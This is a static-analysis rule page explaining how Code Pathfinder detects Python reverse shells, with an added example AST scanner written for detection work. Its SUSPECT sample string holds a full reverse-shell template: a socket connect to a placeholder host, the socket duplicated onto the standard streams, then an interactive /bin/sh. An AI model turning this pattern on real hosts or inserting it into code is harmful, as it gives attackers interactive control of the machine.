pathfinder scan --ruleset python/PYTHON-LANG-SEC-014 --project .

About This Rule
Understanding the vulnerability and how it is detected
A reverse shell is a type of backdoor in which the compromised host initiates an outbound network connection to an attacker-controlled server and then redirects its stdin, stdout, and stderr over that connection, giving the attacker an interactive shell session on the host.
Common Python reverse shell patterns first open a socket connection to a remote IP address and port, then either pass that socket to a child process (for example subprocess.call(["/bin/sh", "-i"]) with the process's standard streams bound to the socket), duplicate the socket's file descriptor over stdin, stdout, and stderr with os.dup2(), or execute code read from the socket through exec()/eval() with __builtins__ access.
Finding this pattern in production code is a critical security incident indicator. It may represent active compromise of the codebase, a supply chain attack through a dependency, a malicious insider contribution, or a legitimate security testing tool that was accidentally included in production code.
Security Implications
Potential attack scenarios if this vulnerability is exploited
Complete Host Compromise
A reverse shell gives the attacker an interactive command line on the host with the privileges of the Python process. All data, credentials, certificates, and capabilities of the process are immediately accessible to the attacker.
Persistent Access
Unlike a one-shot command injection, a reverse shell provides an ongoing interactive session. The attacker can install additional backdoors, lateral movement tools, and persistence mechanisms during the session.
Firewall Bypass via Outbound Connection
Reverse shells initiate outbound connections from the compromised host to the attacker. Most network perimeters allow outbound connections, so this technique bypasses inbound firewall rules that would block a traditional bind shell.
Supply Chain Compromise Indicator
Reverse shell code found in a third-party dependency or unexpected location in the codebase may indicate a supply chain attack. This requires forensic analysis to determine when and how the code was introduced and which systems may have executed it.
How to Fix
Recommended remediation steps
1. Immediately quarantine and investigate any codebase containing a reverse shell pattern; treat it as an active security incident.
2. Audit git history and dependency lockfiles to determine when the reverse shell code was introduced and trace the source.
3. Scan all deployed instances for active outbound connections to unexpected IP addresses and ports.
4. Implement code review policies that flag any use of socket combined with subprocess or os.dup2() for review by the security team.
5. Use software composition analysis (SCA) tools to scan third-party dependencies for malicious code patterns before installation.
Detection Scope
How Code Pathfinder analyzes your code for this vulnerability
This rule detects patterns combining socket module calls (socket.socket, socket.connect) with process execution (subprocess.call, os.dup2, exec) that match known Python reverse shell templates. The pattern is highly specific to malicious code and has very few legitimate uses in production application code.
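The detection logic described above, written out as an added illustration rather than Code Pathfinder's own implementation: a two-pass AST scan that first records which variables are bound to a freshly created socket, then reports (a) any os.dup2() or subprocess call that wires that socket (or its fileno()) onto a standard stream, plus any process launch in the same file, as high severity, and (b) mere co-occurrence of socket creation and process execution as a medium-severity review item. The indicator sets, the severity tiers, and the three sample snippets (with a placeholder host) are constructed assumptions for this example; the daemonizer snippet shows why dup2() alone must not fire the rule.

```python
"""File-level check for the socket + process-execution combination (added example)."""
import ast
import textwrap
from dataclasses import dataclass

# Assumed indicator sets, modelled on the rule description above.
SOCKET_CREATORS = {"socket.socket", "socket.create_connection"}
EXEC_SINKS = {"subprocess.call", "subprocess.Popen", "subprocess.run",
              "os.system", "os.execv", "os.execvp", "exec", "eval"}
STD_STREAMS = {"stdin", "stdout", "stderr"}


@dataclass(frozen=True)
class Finding:
    line: int
    call: str
    severity: str
    reason: str


def _dotted(node):
    """Return 'a.b.c' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_socket_ref(node, socket_vars):
    """True for `s` or `s.fileno()` where s was bound to a socket object."""
    if isinstance(node, ast.Name):
        return node.id in socket_vars
    if isinstance(node, ast.Call):
        return _dotted(node.func) in {f"{v}.fileno" for v in socket_vars}
    return False


def scan_source(src, filename="<constructed>"):
    tree = ast.parse(src, filename)
    # Pass 1: variables assigned directly from a socket constructor.
    socket_vars = set()
    for node in ast.walk(tree):
        if (isinstance(node, ast.Assign) and isinstance(node.value, ast.Call)
                and _dotted(node.value.func) in SOCKET_CREATORS):
            socket_vars.update(t.id for t in node.targets if isinstance(t, ast.Name))
    # Pass 2: classify every call in the file.
    has_socket = False
    redirects = []  # socket descriptor wired onto stdin/stdout/stderr
    sinks = []      # process or interpreter launches
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        if name in SOCKET_CREATORS:
            has_socket = True
        elif name == "os.dup2" and node.args and _is_socket_ref(node.args[0], socket_vars):
            redirects.append((node.lineno, name))
        elif name in EXEC_SINKS:
            if any(kw.arg in STD_STREAMS and _is_socket_ref(kw.value, socket_vars)
                   for kw in node.keywords):
                redirects.append((node.lineno, name))
            else:
                sinks.append((node.lineno, name))
    findings = []
    if redirects:
        findings += [Finding(l, c, "high", "socket descriptor wired onto a standard stream")
                     for l, c in redirects]
        findings += [Finding(l, c, "high", "process launched after socket stream redirection")
                     for l, c in sinks]
    elif has_socket and sinks:
        findings += [Finding(l, c, "medium", "socket creation and process execution co-occur; review")
                     for l, c in sinks]
    return sorted(findings, key=lambda f: f.line)


# Constructed samples. SUSPECT is the textbook shape described in this rule;
# the host/port are placeholders and the string is only parsed, never executed.
SUSPECT = textwrap.dedent("""\
    import os, socket, subprocess
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("PLACEHOLDER_HOST", 0))
    os.dup2(s.fileno(), 0)
    os.dup2(s.fileno(), 1)
    os.dup2(s.fileno(), 2)
    subprocess.call(["/bin/sh", "-i"])
""")
DAEMONIZER = textwrap.dedent("""\
    import os
    devnull = os.open("/dev/null", os.O_RDWR)
    os.dup2(devnull, 0); os.dup2(devnull, 1); os.dup2(devnull, 2)
""")
HEALTHCHECK = textwrap.dedent("""\
    import socket, subprocess
    conn = socket.create_connection(("db.internal.example", 5432), timeout=2)
    conn.close()
    subprocess.run(["systemctl", "is-active", "postgresql"], check=False)
""")

if __name__ == "__main__":
    for label, src in [("SUSPECT", SUSPECT), ("DAEMONIZER", DAEMONIZER), ("HEALTHCHECK", HEALTHCHECK)]:
        print(label, scan_source(src) or "no findings")
```

The high tier is the signature this rule targets; the medium tier corresponds to the "flag socket combined with subprocess or os.dup2() for security review" policy in the remediation steps, and is where an analyst would expect the occasional legitimate hit.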
Similar Rules
Explore related security rules for Python
Dangerous os.system() or os.popen() Call
os.system() and os.popen() execute shell commands via /bin/sh, enabling command injection when arguments contain untrusted input.
Dangerous subprocess Usage
subprocess calls detected. Ensure command arguments are not user-controlled to prevent OS command injection.
Socket Bound to All Interfaces (0.0.0.0)
Binding a socket to 0.0.0.0 exposes the service on all network interfaces, including public-facing ones. Bind to specific interfaces in production.